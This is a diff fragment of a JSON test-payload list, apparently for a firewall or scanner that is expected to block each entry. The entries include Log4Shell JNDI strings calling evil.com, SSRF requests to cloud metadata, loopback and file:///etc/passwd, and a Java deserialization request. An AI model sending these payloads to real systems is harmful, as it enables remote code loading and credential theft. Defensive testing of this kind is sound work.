+    "payload": "POST /api/deserialize HTTP/1.1\r\nContent-Type: application/x-java-serialized-object",
+    "tags": ["owasp-top10", "A08", "software-data-integrity"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A08:2021 - Java deserialization",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A09-LOGGING-001",
+    "payload": "GET /api/search?q=${jndi:ldap://evil.com/a}",
+    "tags": ["owasp-top10", "A09", "logging-failures", "log4shell", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A09:2021 - Log4Shell attack",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A09-LOGGING-002",
+    "payload": "GET /api/test?id=1 HTTP/1.1\r\nX-Forwarded-For: ${jndi:rmi://evil.com/a}",
+    "tags": ["owasp-top10", "A09", "logging-failures", "log4shell"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A09:2021 - Log4Shell in header",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A10-SSRF-001",
+    "payload": "GET /api/fetch?url=http://169.254.169.254/latest/meta-data/",
+    "tags": ["owasp-top10", "A10", "ssrf", "aws", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A10:2021 - AWS metadata SSRF",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A10-SSRF-002",
+    "payload": "GET /api/fetch?url=http://localhost:22/",
+    "tags": ["owasp-top10", "A10", "ssrf", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A10:2021 - Localhost SSRF",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A10-SSRF-003",
+    "payload": "GET /api/fetch?url=file:///etc/passwd",
+    "tags": ["owasp-top10", "A10", "ssrf", "lfi", "quick"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A10:2021 - File protocol SSRF",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A10-SSRF-004",
+    "payload": "GET /api/fetch?url=http://[::1]:8080/admin",
+    "tags": ["owasp-top10", "A10", "ssrf", "ipv6"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A10:2021 - IPv6 localhost SSRF",
+    "category": "OWASP-Top10"
+  },
+  {
+    "id": "OWASP-A10-SSRF-005",
+    "payload": "GET /api/fetch?url=http://0177.0.0.1/admin",
+    "tags": ["owasp-top10", "A10", "ssrf", "octal"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OWASP A10:2021 - Octal IP SSRF bypass",
+    "category": "OWASP-Top10"
+  }
+]